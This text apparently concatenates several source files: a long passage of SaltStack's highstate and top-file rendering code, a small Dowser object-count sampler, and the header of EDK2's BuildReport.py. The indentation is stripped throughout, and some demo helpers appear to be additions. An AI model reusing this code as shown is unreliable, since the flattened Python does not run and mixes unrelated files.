"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'merge' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
elif saltenv in top:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as this "
"saltenv was already defined in the 'base' top "
"file",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_same(self, tops):
"""
For each saltenv, only consider the top file from that saltenv. All
sections matching a given saltenv, which appear in a different
saltenv's top file, will be ignored.
"""
top = DefaultOrderedDict(OrderedDict)
for cenv, ctops in tops.items():
if all([x == {} for x in ctops]):
# No top file found in this env, check the default_top
default_top = self.opts["default_top"]
fallback_tops = tops.get(default_top, [])
if all([x == {} for x in fallback_tops]):
# Nothing in the fallback top file
log.error(
"The '%s' saltenv has no top file, and the fallback "
"saltenv specified by default_top (%s) also has no "
"top file",
cenv,
default_top,
)
continue
for ctop in fallback_tops:
for saltenv, targets in ctop.items():
if saltenv != cenv:
continue
log.debug(
"The '%s' saltenv has no top file, using the "
"default_top saltenv (%s)",
cenv,
default_top,
)
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
break
else:
log.error(
"The '%s' saltenv has no top file, and no "
"matches were found in the top file for the "
"default_top saltenv (%s)",
cenv,
default_top,
)
continue
else:
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
"Section for saltenv '%s' in the '%s' "
"saltenv's top file will be ignored, as the "
"top_file_merging_strategy is set to 'same' "
"and the saltenvs do not match",
saltenv,
cenv,
)
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def _merge_tops_merge_all(self, tops):
"""
Merge the top files into a single dictionary
"""
def _read_tgt(tgt):
match_type = None
states = []
for item in tgt:
if isinstance(item, dict):
match_type = item
if isinstance(item, str):
states.append(item)
return match_type, states
top = DefaultOrderedDict(OrderedDict)
for ctops in tops.values():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
if tgt not in top[saltenv]:
top[saltenv][tgt] = ctop[saltenv][tgt]
continue
m_type1, m_states1 = _read_tgt(top[saltenv][tgt])
m_type2, m_states2 = _read_tgt(ctop[saltenv][tgt])
merged = []
match_type = m_type2 or m_type1
if match_type is not None:
merged.append(match_type)
merged.extend(m_states1)
merged.extend([x for x in m_states2 if x not in merged])
top[saltenv][tgt] = merged
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
return top
def verify_tops(self, tops):
"""
Verify the contents of the top file data
"""
errors = []
if not isinstance(tops, dict):
errors.append("Top data was not formed as a dict")
# No further checks will work, bail out
return errors
for saltenv, matches in tops.items():
if saltenv == "include":
continue
if not isinstance(saltenv, str):
errors.append(
"Environment {} in top file is not formed as a "
"string".format(saltenv)
)
if saltenv == "":
errors.append("Empty saltenv statement in top file")
if not isinstance(matches, dict):
errors.append(
"The top file matches for saltenv {} are not "
"formatted as a dict".format(saltenv)
)
for slsmods in matches.values():
if not isinstance(slsmods, list):
errors.append(
"Malformed topfile (state declarations not " "formed as a list)"
)
continue
for slsmod in slsmods:
if isinstance(slsmod, dict):
# This value is a match option
for val in slsmod.values():
if not val:
errors.append(
"Improperly formatted top file matcher "
"in saltenv {}: {} file".format(slsmod, val)
)
elif isinstance(slsmod, str):
# This is a sls module
if not slsmod:
errors.append(
"Environment {} contains an empty sls "
"index".format(saltenv)
)
return errors
def get_top(self):
"""
Returns the high data derived from the top file
"""
try:
tops = self.get_tops()
except SaltRenderError as err:
log.error("Unable to render top file: %s", err.error)
return {}
return self.merge_tops(tops)
def top_matches(self, top):
"""
Search through the top high data for matches and return the states
that this minion needs to execute.
Returns:
{'saltenv': ['state1', 'state2', ...]}
"""
matches = DefaultOrderedDict(OrderedDict)
# pylint: disable=cell-var-from-loop
for saltenv, body in top.items():
if self.opts["saltenv"]:
if saltenv != self.opts["saltenv"]:
continue
for match, data in body.items():
def _filter_matches(_match, _data, _opts):
if isinstance(_data, str):
_data = [_data]
if self.matchers["confirm_top.confirm_top"](_match, _data, _opts):
if saltenv not in matches:
matches[saltenv] = []
for item in _data:
if "subfilter" in item:
_tmpdata = item.pop("subfilter")
for match, data in _tmpdata.items():
_filter_matches(match, data, _opts)
if isinstance(item, str):
matches[saltenv].append(item)
elif isinstance(item, dict):
env_key, inc_sls = item.popitem()
if env_key not in self.avail:
continue
if env_key not in matches:
matches[env_key] = []
matches[env_key].append(inc_sls)
_filter_matches(match, data, self.opts["nodegroups"])
ext_matches = self._master_tops()
for saltenv in ext_matches:
top_file_matches = matches.get(saltenv, [])
if self.opts.get("master_tops_first"):
first = ext_matches[saltenv]
second = top_file_matches
else:
first = top_file_matches
second = ext_matches[saltenv]
matches[saltenv] = first + [x for x in second if x not in first]
# pylint: enable=cell-var-from-loop
return matches
def _master_tops(self):
"""
Get results from the master_tops system. Override this function if the
execution of the master_tops needs customization.
"""
return self.client.master_tops()
def load_dynamic(self, matches):
"""
If autoload_dynamic_modules is True then automatically load the
dynamic modules
"""
if not self.opts["autoload_dynamic_modules"]:
return
syncd = self.state.functions["saltutil.sync_all"](list(matches), refresh=False)
if syncd["grains"]:
self.opts["grains"] = salt.loader.grains(self.opts)
self.state.opts["pillar"] = self.state._gather_pillar()
self.state.module_refresh()
def render_state(self, sls, saltenv, mods, matches, local=False, context=None):
"""
Render a state file and retrieve all of the include states
"""
errors = []
if not local:
state_data = self.client.get_state(sls, saltenv)
fn_ = state_data.get("dest", False)
else:
fn_ = sls
if not os.path.isfile(fn_):
errors.append(
"Specified SLS {} on local filesystem cannot "
"be found.".format(sls)
)
state = None
if not fn_:
errors.append(
"Specified SLS {} in saltenv {} is not "
"available on the salt master or through a configured "
"fileserver".format(sls, saltenv)
)
else:
try:
state = compile_template(
fn_,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
sls,
rendered_sls=mods,
context=context,
)
except SaltRenderError as exc:
msg = "Rendering SLS '{}:{}' failed: {}".format(saltenv, sls, exc)
log.critical(msg)
errors.append(msg)
except Exception as exc: # pylint: disable=broad-except
msg = "Rendering SLS {} failed, render error: {}".format(sls, exc)
log.critical(
msg,
# Show the traceback if the debug logging level is enabled
exc_info_on_loglevel=logging.DEBUG,
)
errors.append("{}\n{}".format(msg, traceback.format_exc()))
try:
mods.add("{}:{}".format(saltenv, sls))
except AttributeError:
pass
if state:
if not isinstance(state, dict):
errors.append("SLS {} does not render to a dictionary".format(sls))
else:
include = []
if "include" in state:
if not isinstance(state["include"], list):
err = (
"Include Declaration in SLS {} is not formed "
"as a list".format(sls)
)
errors.append(err)
else:
include = state.pop("include")
self._handle_extend(state, sls, saltenv, errors)
self._handle_exclude(state, sls, saltenv, errors)
self._handle_state_decls(state, sls, saltenv, errors)
for inc_sls in include:
# inc_sls may take the form of:
# 'sls.to.include' <- same as {<saltenv>: 'sls.to.include'}
# {<env_key>: 'sls.to.include'}
# {'_xenv': 'sls.to.resolve'}
xenv_key = "_xenv"
if isinstance(inc_sls, dict):
env_key, inc_sls = inc_sls.popitem()
else:
env_key = saltenv
if env_key not in self.avail:
msg = (
"Nonexistent saltenv '{}' found in include "
"of '{}' within SLS '{}:{}'".format(
env_key, inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
if inc_sls.startswith("."):
match = re.match(r"^(\.+)(.*)$", inc_sls)
if match:
levels, include = match.groups()
else:
msg = (
"Badly formatted include {0} found in include "
"in SLS '{2}:{3}'".format(inc_sls, saltenv, sls)
)
log.error(msg)
errors.append(msg)
continue
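                        # Each leading dot walks one package level up from the
                        # current sls (one dot resolves within the same package,
                        # two dots in its parent, and so on), mirroring
                        # Python-style relative imports.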
level_count = len(levels)
p_comps = sls.split(".")
if state_data.get("source", "").endswith("/init.sls"):
p_comps.append("init")
if level_count > len(p_comps):
msg = (
"Attempted relative include of '{}' "
"within SLS '{}:{}' "
"goes beyond top level package ".format(
inc_sls, saltenv, sls
)
)
log.error(msg)
errors.append(msg)
continue
inc_sls = ".".join(p_comps[:-level_count] + [include])
if env_key != xenv_key:
if matches is None:
matches = []
# Resolve inc_sls in the specified environment
if env_key in matches or fnmatch.filter(
self.avail[env_key], inc_sls
):
resolved_envs = [env_key]
else:
resolved_envs = []
else:
# Resolve inc_sls in the subset of environment matches
resolved_envs = [
aenv
for aenv in matches
if fnmatch.filter(self.avail[aenv], inc_sls)
]
# An include must be resolved to a single environment, or
# the include must exist in the current environment
if len(resolved_envs) == 1 or saltenv in resolved_envs:
# Match inc_sls against the available states in the
# resolved env, matching wildcards in the process. If
# there were no matches, then leave inc_sls as the
# target so that the next recursion of render_state
# will recognize the error.
sls_targets = fnmatch.filter(self.avail[saltenv], inc_sls) or [
inc_sls
]
for sls_target in sls_targets:
r_env = (
resolved_envs[0] if len(resolved_envs) == 1 else saltenv
)
mod_tgt = "{}:{}".format(r_env, sls_target)
if mod_tgt not in mods:
nstate, err = self.render_state(
sls_target, r_env, mods, matches
)
if nstate:
self.merge_included_states(state, nstate, errors)
state.update(nstate)
if err:
errors.extend(err)
else:
msg = ""
if not resolved_envs:
msg = (
"Unknown include: Specified SLS {}: {} is not available on the salt "
"master in saltenv(s): {} "
).format(
env_key,
inc_sls,
", ".join(matches) if env_key == xenv_key else env_key,
)
elif len(resolved_envs) > 1:
msg = (
"Ambiguous include: Specified SLS {}: {} is available on the salt master "
"in multiple available saltenvs: {}"
).format(env_key, inc_sls, ", ".join(resolved_envs))
log.critical(msg)
errors.append(msg)
try:
self._handle_iorder(state)
except TypeError:
log.critical("Could not render SLS %s. Syntax error detected.", sls)
else:
state = {}
return state, errors
def _handle_iorder(self, state):
"""
Take a state and apply the iorder system
"""
if self.opts["state_auto_order"]:
for name in state:
for s_dec in state[name]:
if not isinstance(s_dec, str):
# PyDSL OrderedDict?
continue
if not isinstance(state[name], dict):
                        # Includes or excludes as lists?
continue
if not isinstance(state[name][s_dec], list):
# Bad syntax, let the verify seq pick it up later on
continue
found = False
if s_dec.startswith("_"):
continue
for arg in state[name][s_dec]:
if isinstance(arg, dict):
if len(arg) > 0:
if next(iter(arg.keys())) == "order":
found = True
if not found:
if not isinstance(state[name][s_dec], list):
# quite certainly a syntax error, managed elsewhere
continue
state[name][s_dec].append({"order": self.iorder})
self.iorder += 1
return state
def _handle_state_decls(self, state, sls, saltenv, errors):
"""
Add sls and saltenv components to the state
"""
for name in state:
if not isinstance(state[name], dict):
if name == "__extend__":
continue
if name == "__exclude__":
continue
if isinstance(state[name], str):
                    # If this is a short state, it needs to be padded
if "." in state[name]:
comps = state[name].split(".")
state[name] = {
"__sls__": sls,
"__env__": saltenv,
comps[0]: [comps[1]],
}
continue
errors.append("ID {} in SLS {} is not a dictionary".format(name, sls))
continue
skeys = set()
for key in list(state[name]):
if key.startswith("_"):
continue
if not isinstance(state[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - source: salt://redis/redis.conf
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in SLS '{}' contains multiple state "
"declarations of the same type".format(name, sls)
)
continue
state[name][comps[0]] = state[name].pop(key)
state[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
if "__sls__" not in state[name]:
state[name]["__sls__"] = sls
if "__env__" not in state[name]:
state[name]["__env__"] = saltenv
def _handle_extend(self, state, sls, saltenv, errors):
"""
Take the extend dec out of state and apply to the highstate global
dec
"""
if "extend" in state:
ext = state.pop("extend")
if not isinstance(ext, dict):
errors.append(
("Extension value in SLS '{}' is not a " "dictionary").format(sls)
)
return
for name in ext:
if not isinstance(ext[name], dict):
errors.append(
"Extension name '{}' in SLS '{}' is "
"not a dictionary".format(name, sls)
)
continue
if "__sls__" not in ext[name]:
ext[name]["__sls__"] = sls
if "__env__" not in ext[name]:
ext[name]["__env__"] = saltenv
for key in list(ext[name]):
if key.startswith("_"):
continue
if not isinstance(ext[name][key], list):
continue
if "." in key:
comps = key.split(".")
ext[name][comps[0]] = ext[name].pop(key)
ext[name][comps[0]].append(comps[1])
state.setdefault("__extend__", []).append(ext)
def _handle_exclude(self, state, sls, saltenv, errors):
"""
Take the exclude dec out of the state and apply it to the highstate
global dec
"""
if "exclude" in state:
exc = state.pop("exclude")
if not isinstance(exc, list):
err = "Exclude Declaration in SLS {} is not formed " "as a list".format(
sls
)
errors.append(err)
state.setdefault("__exclude__", []).extend(exc)
def render_highstate(self, matches, context=None):
"""
Gather the state files and render them into a single unified salt
high data structure.
"""
highstate = self.building_highstate
all_errors = []
mods = set()
statefiles = []
for saltenv, states in matches.items():
for sls_match in states:
if saltenv in self.avail:
statefiles = fnmatch.filter(self.avail[saltenv], sls_match)
elif "__env__" in self.avail:
statefiles = fnmatch.filter(self.avail["__env__"], sls_match)
else:
all_errors.append(
"No matching salt environment for environment "
"'{}' found".format(saltenv)
)
                # If we did not find any sls in the fileserver listing, the sls
                # may have been generated or added later; try to execute it
                # directly, and if that fails it will return the former error
                # anyway.
if not statefiles:
statefiles = [sls_match]
for sls in statefiles:
r_env = "{}:{}".format(saltenv, sls)
if r_env in mods:
continue
state, errors = self.render_state(
sls, saltenv, mods, matches, context=context
)
if state:
self.merge_included_states(highstate, state, errors)
for i, error in enumerate(errors[:]):
if "is not available" in error:
# match SLS foobar in environment
this_sls = "SLS {} in saltenv".format(sls_match)
if this_sls in error:
errors[i] = (
"No matching sls found for '{}' "
"in env '{}'".format(sls_match, saltenv)
)
all_errors.extend(errors)
self.clean_duplicate_extends(highstate)
return highstate, all_errors
def clean_duplicate_extends(self, highstate):
if "__extend__" in highstate:
highext = []
for items in (ext.items() for ext in highstate["__extend__"]):
for item in items:
if item not in highext:
highext.append(item)
highstate["__extend__"] = [{t[0]: t[1]} for t in highext]
def merge_included_states(self, highstate, state, errors):
# The extend members can not be treated as globally unique:
if "__extend__" in state:
highstate.setdefault("__extend__", []).extend(state.pop("__extend__"))
if "__exclude__" in state:
highstate.setdefault("__exclude__", []).extend(state.pop("__exclude__"))
for id_ in state:
if id_ in highstate:
if highstate[id_] != state[id_]:
errors.append(
(
"Detected conflicting IDs, SLS"
" IDs need to be globally unique.\n The"
" conflicting ID is '{}' and is found in SLS"
" '{}:{}' and SLS '{}:{}'"
).format(
id_,
highstate[id_]["__env__"],
highstate[id_]["__sls__"],
state[id_]["__env__"],
state[id_]["__sls__"],
)
)
try:
highstate.update(state)
except ValueError:
errors.append("Error when rendering state with contents: {}".format(state))
def _check_pillar(self, force=False):
"""
Check the pillar for errors, refuse to run the state if there are
errors in the pillar and return the pillar errors
"""
if force:
return True
if "_errors" in self.state.opts["pillar"]:
return False
return True
def matches_whitelist(self, matches, whitelist):
"""
Reads over the matches and returns a matches dict with just the ones
that are in the whitelist
"""
if not whitelist:
return matches
ret_matches = {}
if not isinstance(whitelist, list):
whitelist = whitelist.split(",")
for env in matches:
for sls in matches[env]:
if sls in whitelist:
ret_matches[env] = ret_matches[env] if env in ret_matches else []
ret_matches[env].append(sls)
return ret_matches
def call_highstate(
self,
exclude=None,
cache=None,
cache_name="highstate",
force=False,
whitelist=None,
orchestration_jid=None,
):
"""
Run the sequence to execute the salt highstate for this minion
"""
# Check that top file exists
tag_name = "no_|-states_|-states_|-None"
ret = {
tag_name: {
"result": False,
"comment": "No states found for this minion",
"name": "No States",
"changes": {},
"__run_num__": 0,
}
}
cfn = os.path.join(self.opts["cachedir"], "{}.cache.p".format(cache_name))
if cache:
if os.path.isfile(cfn):
with salt.utils.files.fopen(cfn, "rb") as fp_:
high = self.serial.load(fp_)
return self.state.call_high(high, orchestration_jid)
        # No usable cached highstate; continue and compile it from the top file
err = []
try:
top = self.get_top()
except SaltRenderError as err:
ret[tag_name]["comment"] = "Unable to render top file: "
ret[tag_name]["comment"] += str(err.error)
return ret
except Exception: # pylint: disable=broad-except
trb = traceback.format_exc()
err.append(trb)
return err
err += self.verify_tops(top)
matches = self.top_matches(top)
if not matches:
msg = (
"No Top file or master_tops data matches found. Please see "
"master log for details."
)
ret[tag_name]["comment"] = msg
return ret
matches = self.matches_whitelist(matches, whitelist)
self.load_dynamic(matches)
if not self._check_pillar(force):
err += ["Pillar failed to render with the following messages:"]
err += self.state.opts["pillar"]["_errors"]
else:
high, errors = self.render_highstate(matches)
if exclude:
if isinstance(exclude, str):
exclude = exclude.split(",")
if "__exclude__" in high:
high["__exclude__"].extend(exclude)
else:
high["__exclude__"] = exclude
err += errors
if err:
return err
if not high:
return ret
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Make sure cache file isn't read-only
self.state.functions["cmd.run"](
["attrib", "-R", cfn],
python_shell=False,
output_loglevel="quiet",
)
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
self.serial.dump(high, fp_)
except TypeError:
# Can't serialize pydsl
pass
except OSError:
log.error('Unable to write to "state.highstate" cache file %s', cfn)
return self.state.call_high(high, orchestration_jid)
def compile_highstate(self):
"""
Return just the highstate or the errors
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
err += errors
if err:
return err
return high
def compile_low_chunks(self):
"""
Compile the highstate but don't run it, return the low chunks to
see exactly what the highstate will execute
"""
top = self.get_top()
matches = self.top_matches(top)
high, errors = self.render_highstate(matches)
# If there is extension data reconcile it
high, ext_errors = self.state.reconcile_extend(high)
errors += ext_errors
# Verify that the high data is structurally sound
errors += self.state.verify_high(high)
high, req_in_errors = self.state.requisite_in(high)
errors += req_in_errors
high = self.state.apply_exclude(high)
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.state.compile_high_data(high)
return chunks
def compile_state_usage(self):
"""
Return all used and unused states for the minion based on the top match data
"""
err = []
top = self.get_top()
err += self.verify_tops(top)
if err:
return err
matches = self.top_matches(top)
state_usage = {}
for saltenv, states in self.avail.items():
env_usage = {
"used": [],
"unused": [],
"count_all": 0,
"count_used": 0,
"count_unused": 0,
}
            env_matches = matches.get(saltenv, [])
for state in states:
env_usage["count_all"] += 1
if state in env_matches:
env_usage["count_used"] += 1
env_usage["used"].append(state)
else:
env_usage["count_unused"] += 1
env_usage["unused"].append(state)
state_usage[saltenv] = env_usage
return state_usage
class HighState(BaseHighState):
"""
Generate and execute the salt "High State". The High State is the
compound state derived from a group of template files stored on the
salt master or in the local cache.
"""
# a stack of active HighState objects during a state.highstate run
stack = []
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.opts = opts
self.client = salt.fileclient.get_file_client(self.opts)
BaseHighState.__init__(self, opts)
self.state = State(
self.opts,
pillar_override,
jid,
pillar_enc,
proxy=proxy,
context=context,
mocked=mocked,
loader=loader,
initial_pillar=initial_pillar,
)
self.matchers = salt.loader.matchers(self.opts)
self.proxy = proxy
# tracks all pydsl state declarations globally across sls files
self._pydsl_all_decls = {}
# a stack of current rendering Sls objects, maintained and used by the pydsl renderer.
self._pydsl_render_stack = []
def push_active(self):
self.stack.append(self)
@classmethod
def clear_active(cls):
# Nuclear option
#
# Blow away the entire stack. Used primarily by the test runner but also
# useful in custom wrappers of the HighState class, to reset the stack
# to a fresh state.
cls.stack = []
@classmethod
def pop_active(cls):
cls.stack.pop()
@classmethod
def get_active(cls):
try:
return cls.stack[-1]
except IndexError:
return None
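# A minimal standalone sketch of the class-level "active stack" pattern used by
# HighState above. It is not Salt code: constructing a real HighState requires
# full minion opts, so a stand-in class is used purely to show how push_active,
# pop_active and get_active cooperate when renders nest.
class _ActiveStackDemo:
    stack = []

    def push_active(self):
        self.stack.append(self)

    @classmethod
    def pop_active(cls):
        cls.stack.pop()

    @classmethod
    def get_active(cls):
        return cls.stack[-1] if cls.stack else None


def _demo_active_stack():
    outer, inner = _ActiveStackDemo(), _ActiveStackDemo()
    outer.push_active()
    inner.push_active()                      # a second object becomes active
    assert _ActiveStackDemo.get_active() is inner
    _ActiveStackDemo.pop_active()            # the outer one is active again
    assert _ActiveStackDemo.get_active() is outer
    _ActiveStackDemo.pop_active()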
class MasterState(State):
"""
Create a State object for master side compiling
"""
def __init__(self, opts, minion):
State.__init__(self, opts)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
# Load a modified client interface that looks like the interface used
# from the minion, but uses remote execution
#
self.functions = salt.client.FunctionWrapper(self.opts, self.opts["id"])
# Load the states, but they should not be used in this class apart
# from inspection
self.utils = salt.loader.utils(self.opts)
self.serializers = salt.loader.serializers(self.opts)
self.states = salt.loader.states(
self.opts, self.functions, self.utils, self.serializers
)
self.rend = salt.loader.render(
self.opts, self.functions, states=self.states, context=self.state_con
)
class MasterHighState(HighState):
"""
Execute highstate compilation from the master
"""
def __init__(self, master_opts, minion_opts, grains, id_, saltenv=None):
# Force the fileclient to be local
opts = copy.deepcopy(minion_opts)
opts["file_client"] = "local"
opts["file_roots"] = master_opts["master_roots"]
opts["renderer"] = master_opts["renderer"]
opts["state_top"] = master_opts["state_top"]
opts["id"] = id_
opts["grains"] = grains
HighState.__init__(self, opts)
class RemoteHighState:
"""
Manage gathering the data from the master
"""
# XXX: This class doesn't seem to be used anywhere
def __init__(self, opts, grains):
self.opts = opts
self.grains = grains
self.serial = salt.payload.Serial(self.opts)
# self.auth = salt.crypt.SAuth(opts)
self.channel = salt.transport.client.ReqChannel.factory(self.opts["master_uri"])
self._closing = False
def compile_master(self):
"""
Return the state data from the master
"""
load = {"grains": self.grains, "opts": self.opts, "cmd": "_master_state"}
try:
return self.channel.send(load, tries=3, timeout=72000)
except SaltReqTimeoutError:
return {}
def destroy(self):
if self._closing:
return
self._closing = True
self.channel.close()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
__init__.py
|
import gc
import threading
import time
from collections import deque
import itertools
# the maximum from each older period is promoted into the next, coarser one
DOWSER_MAXENTRIES = [12, 120, 60, 60]
DOWSER_TICKS = [5, 6, 48, 28]
DOWSER_NAMES = ["1m", "1h", "1d", "4w"]
class Dowser(object):
"""
A worker thread that periodically gathers per-type object counts
"""
history = {}
samples = []
def __init__(self):
# TODO: how to limit it only to server process not the monitor
# TODO: cover multi-process configuration - maybe as separate daemon...
self.running = False
self.samples = [0] * len(DOWSER_MAXENTRIES)
self.runthread = threading.Thread(target=self.start)
self.runthread.daemon = True
self.runthread.start()
def start(self):
self.running = True
while self.running:
self.tick()
time.sleep(DOWSER_TICKS[0])
def tick(self):
gc.collect()
typecounts = {}
for obj in gc.get_objects():
objtype = type(obj)
typename = str(objtype.__module__) + "." + objtype.__name__
if typename in typecounts:
typecounts[typename] += 1
else:
typecounts[typename] = 1
for typename, count in typecounts.items():
if typename not in self.history:
self.history[typename] = [deque([0] * x) for x in DOWSER_MAXENTRIES]
self.history[typename][0].appendleft(count)
self.samples[0] += 1
promote = [False] * (len(DOWSER_MAXENTRIES)-1)
# let's calculate what we promote
for i in range(len(self.samples)-1):
if self.samples[i] >= DOWSER_TICKS[i]:
promote[i] = True
self.samples[i+1] += 1
self.samples[i] = 0
for typename, history in self.history.items():
# promote the maximum of the most recent entries into the lower-granularity history
for i in range(len(self.samples)-1):
if promote[i]:
history[i+1].appendleft(max(itertools.islice(history[i], 0, DOWSER_TICKS[i])))
# let's limit history to DOWSER_MAXENTRIES
for i in range(len(self.samples)):
if len(history[i]) > DOWSER_MAXENTRIES[i]:
history[i].pop()
def stop(self):
self.running = False
dowser = Dowser()
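# Hedged usage sketch: the module already starts a Dowser at import time above,
# so a caller only needs to read `dowser.history` and eventually stop it.
# rings[0] holds the newest per-tick counts; the later rings hold the maxima
# promoted for the longer periods named in DOWSER_NAMES. The 12-second wait is
# arbitrary, just enough for a couple of 5-second ticks to accumulate.
def _example_read_dowser(wait_seconds=12):
    time.sleep(wait_seconds)
    for typename, rings in sorted(dowser.history.items())[:5]:
        print(typename, list(rings[0])[:3])   # newest samples first
    dowser.stop()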
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Patterns to find the FV total size and occupied size in the flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
